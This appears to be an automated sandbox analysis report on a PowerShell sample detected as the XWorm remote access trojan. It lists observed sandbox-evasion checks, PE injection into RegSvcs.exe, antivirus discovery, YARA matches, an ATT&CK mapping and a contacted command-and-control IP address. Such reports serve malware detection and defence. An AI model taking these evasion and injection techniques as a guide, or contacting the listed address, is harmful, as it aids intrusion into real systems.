              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3403Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3398Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5630Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4203Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Amcache.hve.12.drBinary or memory string: VMware
              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.12.drBinary or memory string: vmci.sys
              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.12.drBinary or memory string: VMware20,1
              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
              Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7D7008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7560, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7560, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		212
              Process Injection              		1
              Disable or Modify Tools              		OS Credential Dumping131
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol1
              Clipboard Data              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
              Process Injection              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync13
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              WErY5oc4hl.ps131%VirustotalBrowse
              WErY5oc4hl.ps121%ReversingLabsScript-PowerShell.Trojan.XWorm

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              92.255.57.1550%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0035.t-0009.t-msedge.net
              		13.107.246.63
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                92.255.57.155true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
